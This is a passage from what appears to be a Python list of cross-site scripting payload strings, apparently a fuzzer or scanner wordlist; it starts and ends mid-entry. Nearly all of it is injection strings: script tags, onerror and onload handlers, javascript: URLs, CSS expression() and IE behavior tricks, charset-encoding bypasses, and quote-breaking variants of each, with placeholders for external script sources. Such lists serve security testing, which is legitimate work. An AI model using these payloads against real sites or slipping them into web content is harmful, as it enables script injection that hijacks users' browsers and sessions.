onerror=javascript:alert(1)//\'>', '"><x \'="foo"><x foo=\'><img src=x onerror=javascript:alert(1)//\'>', '\'><x \'="foo"><x foo=\'><img src=x onerror=javascript:alert(1)//\'>', '<embed src="javascript:alert(1)">', '"><embed src="javascript:alert(1)">', '\'><embed src="javascript:alert(1)">', '<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x', '"><div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x', "'><div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x", '<? foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '"><? foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '\'><? foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '<! foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '"><! foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '\'><! foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '</ foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '"></ foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '\'></ foo="><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '<? foo="><x foo=\'?><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>\'>">', '"><? foo="><x foo=\'?><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>\'>">', '\'><? foo="><x foo=\'?><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>\'>">', '<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '"><! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '\'><! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '<% foo><x foo="%><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '"><% foo><x foo="%><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '\'><% foo><x foo="%><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>">', '<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>', '"><div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>', '\'><div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>', '<img \\x00src=x onerror="alert(1)">', '"><img \\x00src=x onerror="alert(1)">', '\'><img \\x00src=x onerror="alert(1)">', '<img \\x47src=x onerror="javascript:alert(1)">', '"><img \\x47src=x onerror="javascript:alert(1)">', '\'><img \\x47src=x onerror="javascript:alert(1)">', '<img \\x11src=x onerror="javascript:alert(1)">', '"><img \\x11src=x onerror="javascript:alert(1)">', '\'><img \\x11src=x onerror="javascript:alert(1)">', '<img \\x12src=x onerror="javascript:alert(1)">', '"><img \\x12src=x onerror="javascript:alert(1)">', '\'><img \\x12src=x onerror="javascript:alert(1)">', '<img\\x47src=x onerror="javascript:alert(1)">', '"><img\\x47src=x onerror="javascript:alert(1)">', '\'><img\\x47src=x onerror="javascript:alert(1)">', '<img\\x10src=x onerror="javascript:alert(1)">', '"><img\\x10src=x onerror="javascript:alert(1)">', '\'><img\\x10src=x onerror="javascript:alert(1)">', '<img\\x13src=x onerror="javascript:alert(1)">', '"><img\\x13src=x onerror="javascript:alert(1)">', '\'><img\\x13src=x onerror="javascript:alert(1)">', '<img\\x32src=x onerror="javascript:alert(1)">', '"><img\\x32src=x onerror="javascript:alert(1)">', '\'><img\\x32src=x onerror="javascript:alert(1)">', '<img\\x11src=x onerror="javascript:alert(1)">', '"><img\\x11src=x onerror="javascript:alert(1)">', '\'><img\\x11src=x onerror="javascript:alert(1)">', '<img \\x34src=x onerror="javascript:alert(1)">', '"><img \\x34src=x onerror="javascript:alert(1)">', '\'><img \\x34src=x onerror="javascript:alert(1)">', '<img \\x39src=x onerror="javascript:alert(1)">', '"><img \\x39src=x onerror="javascript:alert(1)">', '\'><img \\x39src=x onerror="javascript:alert(1)">', '<img \\x00src=x onerror="javascript:alert(1)">', '"><img \\x00src=x onerror="javascript:alert(1)">', '\'><img \\x00src=x onerror="javascript:alert(1)">', '<img src\\x09=x onerror="javascript:alert(1)">', '"><img src\\x09=x onerror="javascript:alert(1)">', '\'><img src\\x09=x onerror="javascript:alert(1)">', '<img src\\x10=x onerror="javascript:alert(1)">', '"><img src\\x10=x onerror="javascript:alert(1)">', '\'><img src\\x10=x onerror="javascript:alert(1)">', '<img src\\x13=x onerror="javascript:alert(1)">', '"><img src\\x13=x onerror="javascript:alert(1)">', '\'><img src\\x13=x onerror="javascript:alert(1)">', '<img src\\x32=x onerror="javascript:alert(1)">', '"><img src\\x32=x onerror="javascript:alert(1)">', '\'><img src\\x32=x onerror="javascript:alert(1)">', '<img src\\x12=x onerror="javascript:alert(1)">', '"><img src\\x12=x onerror="javascript:alert(1)">', '\'><img src\\x12=x onerror="javascript:alert(1)">', '<img src\\x11=x onerror="javascript:alert(1)">', '"><img src\\x11=x onerror="javascript:alert(1)">', '\'><img src\\x11=x onerror="javascript:alert(1)">', '<img src\\x00=x onerror="javascript:alert(1)">', '"><img src\\x00=x onerror="javascript:alert(1)">', '\'><img src\\x00=x onerror="javascript:alert(1)">', '<img src\\x47=x onerror="javascript:alert(1)">', '"><img src\\x47=x onerror="javascript:alert(1)">', '\'><img src\\x47=x onerror="javascript:alert(1)">', '<img src=x\\x09onerror="javascript:alert(1)">', '"><img src=x\\x09onerror="javascript:alert(1)">', '\'><img src=x\\x09onerror="javascript:alert(1)">', '<img src=x\\x10onerror="javascript:alert(1)">', '"><img src=x\\x10onerror="javascript:alert(1)">', '\'><img src=x\\x10onerror="javascript:alert(1)">', '<img src=x\\x11onerror="javascript:alert(1)">', '"><img src=x\\x11onerror="javascript:alert(1)">', '\'><img src=x\\x11onerror="javascript:alert(1)">', '<img src=x\\x12onerror="javascript:alert(1)">', '"><img src=x\\x12onerror="javascript:alert(1)">', '\'><img src=x\\x12onerror="javascript:alert(1)">', '<img src=x\\x13onerror="javascript:alert(1)">', '"><img src=x\\x13onerror="javascript:alert(1)">', '\'><img src=x\\x13onerror="javascript:alert(1)">', '<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">', '"><img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">', '\'><img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">', '<img src=x onerror=\\x09"javascript:alert(1)">', '"><img src=x onerror=\\x09"javascript:alert(1)">', '\'><img src=x onerror=\\x09"javascript:alert(1)">', '<img src=x onerror=\\x10"javascript:alert(1)">', '"><img src=x onerror=\\x10"javascript:alert(1)">', '\'><img src=x onerror=\\x10"javascript:alert(1)">', '<img src=x onerror=\\x11"javascript:alert(1)">', '"><img src=x onerror=\\x11"javascript:alert(1)">', '\'><img src=x onerror=\\x11"javascript:alert(1)">', '<img src=x onerror=\\x12"javascript:alert(1)">', '"><img src=x onerror=\\x12"javascript:alert(1)">', '\'><img src=x onerror=\\x12"javascript:alert(1)">', '<img src=x onerror=\\x32"javascript:alert(1)">', '"><img src=x onerror=\\x32"javascript:alert(1)">', '\'><img src=x onerror=\\x32"javascript:alert(1)">', '<img src=x onerror=\\x00"javascript:alert(1)">', '"><img src=x onerror=\\x00"javascript:alert(1)">', '\'><img src=x onerror=\\x00"javascript:alert(1)">', '<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>X</a>', '"><a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>X</a>', "'><a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>X</a>", '<img src="x` `<script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>"` `>', '"><img src="x` `<script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>"` `>', '\'><img src="x` `<script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>"` `>', '<img src onerror /" \'"= alt=javascript:alert(1)//">', '"><img src onerror /" \'"= alt=javascript:alert(1)//">', '\'><img src onerror /" \'"= alt=javascript:alert(1)//">', '<title onpropertychange=javascript:alert(1)></title><title title=>', '"><title onpropertychange=javascript:alert(1)></title><title title=>', "'><title onpropertychange=javascript:alert(1)></title><title title=>", '<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">', '"><a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">', '\'><a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">', '<!--[if]><script>javascript:alert(1)</script -->', '"><!--[if]><script>javascript:alert(1)</script -->', "'><!--[if]><script>javascript:alert(1)</script -->", '<!--[if<img src=x onerror=javascript:alert(1)//]> -->', '"><!--[if<img src=x onerror=javascript:alert(1)//]> -->', "'><!--[if<img src=x onerror=javascript:alert(1)//]> -->", '<script src="/\\%(jscript)s"></script>', '"><script src="/\\%(jscript)s"></script>', '\'><script src="/\\%(jscript)s"></script>', '<script src="\\\\%(jscript)s"></script>', '"><script src="\\\\%(jscript)s"></script>', '\'><script src="\\\\%(jscript)s"></script>', '<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>', '"><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>', '\'><object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>', '<a style="-o-link:\'javascript:javascript:alert(1)\';-o-link-source:current">X', '"><a style="-o-link:\'javascript:javascript:alert(1)\';-o-link-source:current">X', '\'><a style="-o-link:\'javascript:javascript:alert(1)\';-o-link-source:current">X', "<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>", '"><style>p[foo=bar{}*{-o-link:\'javascript:javascript:alert(1)\'}{}*{-o-link-source:current}]{color:red};</style>', "'><style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>", '<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d', '"><link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d', "'><link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d", '<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>', '"><style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>', '\'><style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>', '<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">X</a></a><a href="javascript:javascript:alert(1)">X</a><style>*[{}@import\'%(css)s?]</style>X', '"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">X</a></a><a href="javascript:javascript:alert(1)">X</a><style>*[{}@import\'%(css)s?]</style>X', '\'><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">X</a></a><a href="javascript:javascript:alert(1)">X</a><style>*[{}@import\'%(css)s?]</style>X', '<div style="font-family:\'foo&#10;;color:red;\';">X', '"><div style="font-family:\'foo&#10;;color:red;\';">X', '\'><div style="font-family:\'foo&#10;;color:red;\';">X', '<div style="font-family:foo}color=red;">X', '"><div style="font-family:foo}color=red;">X', '\'><div style="font-family:foo}color=red;">X', '<// style=x:expression\\28javascript:alert(1)\\29>', '"><// style=x:expression\\28javascript:alert(1)\\29>', "'><// style=x:expression\\28javascript:alert(1)\\29>", '<style>*{x:??????????(javascript:alert(1))}</style>', '"><style>*{x:??????????(javascript:alert(1))}</style>', "'><style>*{x:??????????(javascript:alert(1))}</style>", '<div style=content:url(%(svg)s)></div>', '"><div style=content:url(%(svg)s)></div>', "'><div style=content:url(%(svg)s)></div>", '<div style="list-style:url(http://foo.f)\\20url(javascript:javascript:alert(1));">X', '"><div style="list-style:url(http://foo.f)\\20url(javascript:javascript:alert(1));">X', '\'><div style="list-style:url(http://foo.f)\\20url(javascript:javascript:alert(1));">X', '<div id=d><div style="font-family:\'sans\\27\\3B color\\3Ared\\3B\'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>', '"><div id=d><div style="font-family:\'sans\\27\\3B color\\3Ared\\3B\'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>', '\'><div id=d><div style="font-family:\'sans\\27\\3B color\\3Ared\\3B\'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>', '<div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X', '"><div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X', '\'><div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X', '<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '\'><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '<div id="x">X</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>', '"><div id="x">X</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>', '\'><div id="x">X</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>', '<x style="background:url(\'x&#1;;color:red;/*\')">X</x>', '"><x style="background:url(\'x&#1;;color:red;/*\')">X</x>', '\'><x style="background:url(\'x&#1;;color:red;/*\')">X</x>', '<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>', '</ScrIpt><script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>', '"><script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>', '</ScrIpt><script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>', "'><script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>", '</ScrIpt><script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>', '<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>', '</ScrIpt><script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>', '"><script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>', '</ScrIpt><script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>', "'><script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>", '</ScrIpt><script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>', "<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>", "</ScrIpt><script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>", '"><script>ReferenceError.prototype.__defineGetter__(\'name\', function(){javascript:alert(1)}),x</script>', "</ScrIpt><script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>", "'><script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>", "</ScrIpt><script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>", "<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>", "</ScrIpt><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>", '"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(\'javascript:alert(1)\')()</script>', "</ScrIpt><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>", "'><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>", "</ScrIpt><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>", '<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi', '"><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi', '\'><meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi', '<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>', '"><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>', '\'><meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>', '<meta charset="mac-farsi">?script?javascript:alert(1)?/script?', '"><meta charset="mac-farsi">?script?javascript:alert(1)?/script?', '\'><meta charset="mac-farsi">?script?javascript:alert(1)?/script?', 'X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >', '1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`>', '1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>', '<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#X></vmlframe>', '"><vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#X></vmlframe>', "'><vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#X></vmlframe>", '1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>', '<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">X</a>', '"><a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">X</a>', '\'><a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">X</a>', '<x style="behavior:url(%(sct)s)">', '"><x style="behavior:url(%(sct)s)">', '\'><x style="behavior:url(%(sct)s)">', '<xml id="X" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#X" datafld="payload"></label>', '"><xml id="X" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#X" datafld="payload"></label>', '\'><xml id="X" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#X" datafld="payload"></label>', '<event-source src="%(event)s" onload="javascript:alert(1)">', '"><event-source src="%(event)s" onload="javascript:alert(1)">', '\'><event-source src="%(event)s" onload="javascript:alert(1)">', '<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A">', '"><a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A">', '\'><a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:X%0A%0A">', '<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">', '"><div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">', '\'><div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;">', '<script>%(payload)s</script>', '</ScrIpt><script>%(payload)s</script>', '"><script>%(payload)s</script>', '</ScrIpt><script>%(payload)s</script>', "'><script>%(payload)s</script>", '</ScrIpt><script>%(payload)s</script>', '<script src=%(jscript)s></script>', '"><script src=%(jscript)s></script>', "'><script src=%(jscript)s></script>", "<script language='javascript' src='%(jscript)s'></script>", '"><script language=\'javascript\' src=\'%(jscript)s\'></script>', "'><script language='javascript' src='%(jscript)s'></script>", '<script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', '"><script>javascript:alert(1)</script>', '</ScrIpt><script>javascript:alert(1)</script>', "'><script>javascript:alert(1)</script>", '</ScrIpt><script>javascript:alert(1)</script>', '<IMG SRC="javascript:javascript:alert(1);">', '"><IMG SRC="javascript:javascript:alert(1);">', '\'><IMG SRC="javascript:javascript:alert(1);">', '<IMG SRC=javascript:javascript:alert(1)>', '"><IMG SRC=javascript:javascript:alert(1)>', "'><IMG SRC=javascript:javascript:alert(1)>", '<IMG SRC=`javascript:javascript:alert(1)`>', '"><IMG SRC=`javascript:javascript:alert(1)`>', "'><IMG SRC=`javascript:javascript:alert(1)`>", '<SCRIPT SRC=%(jscript)s?<B>', '"><SCRIPT SRC=%(jscript)s?<B>', "'><SCRIPT SRC=%(jscript)s?<B>", '<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>', '"><FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>', '\'><FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>', '<BODY ONLOAD=javascript:alert(1)>', '"><BODY ONLOAD=javascript:alert(1)>', "'><BODY ONLOAD=javascript:alert(1)>", '<BODY ONLOAD=javascript:javascript:alert(1)>', '"><BODY ONLOAD=javascript:javascript:alert(1)>', "'><BODY ONLOAD=javascript:javascript:alert(1)>", '<IMG SRC="jav\tascript:javascript:alert(1);">', '"><IMG SRC="jav\tascript:javascript:alert(1);">', '\'><IMG SRC="jav\tascript:javascript:alert(1);">', '<BODY onload!#$%%&()*~+-_.,:;?@[/|\\]^`=javascript:alert(1)>', '"><BODY onload!#$%%&()*~+-_.,:;?@[/|\\]^`=javascript:alert(1)>', "'><BODY onload!#$%%&()*~+-_.,:;?@[/|\\]^`=javascript:alert(1)>", '<SCRIPT/SRC="%(jscript)s"></SCRIPT>', '"><SCRIPT/SRC="%(jscript)s"></SCRIPT>', '\'><SCRIPT/SRC="%(jscript)s"></SCRIPT>', '<<SCRIPT>%(payload)s//<</SCRIPT>', '"><<SCRIPT>%(payload)s//<</SCRIPT>', "'><<SCRIPT>%(payload)s//<</SCRIPT>", '<IMG SRC="javascript:javascript:alert(1)"', '"><IMG SRC="javascript:javascript:alert(1)"', '\'><IMG SRC="javascript:javascript:alert(1)"', '<iframe src=%(scriptlet)s <', '"><iframe src=%(scriptlet)s <', "'><iframe src=%(scriptlet)s <", '<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">', '"><INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">', '\'><INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">', '<IMG DYNSRC="javascript:javascript:alert(1)">', '"><IMG DYNSRC="javascript:javascript:alert(1)">', '\'><IMG DYNSRC="javascript:javascript:alert(1)">', '<IMG LOWSRC="javascript:javascript:alert(1)">', '"><IMG LOWSRC="javascript:javascript:alert(1)">', '\'><IMG LOWSRC="javascript:javascript:alert(1)">', '<BGSOUND SRC="javascript:javascript:alert(1);">', '"><BGSOUND SRC="javascript:javascript:alert(1);">', '\'><BGSOUND SRC="javascript:javascript:alert(1);">', '<BR SIZE="&{javascript:alert(1)}">', '"><BR SIZE="&{javascript:alert(1)}">', '\'><BR SIZE="&{javascript:alert(1)}">', '<LAYER SRC="%(scriptlet)s"></LAYER>', '"><LAYER SRC="%(scriptlet)s"></LAYER>', '\'><LAYER SRC="%(scriptlet)s"></LAYER>', '<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">', '"><LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">', '\'><LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">', "<STYLE>@import'%(css)s';</STYLE>", '"><STYLE>@import\'%(css)s\';</STYLE>', "'><STYLE>@import'%(css)s';</STYLE>", '<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">', '"><META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">', '\'><META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">', '<X STYLE="behavior: url(%(htc)s);">', '"><X STYLE="behavior: url(%(htc)s);">', '\'><X STYLE="behavior: url(%(htc)s);">', '<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>X', '"><STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>X', '\'><STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>X', '<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">', '"><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">', '\'><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">', '<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">', '"><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">', '\'><META HTTP-EQUIV="refresh" 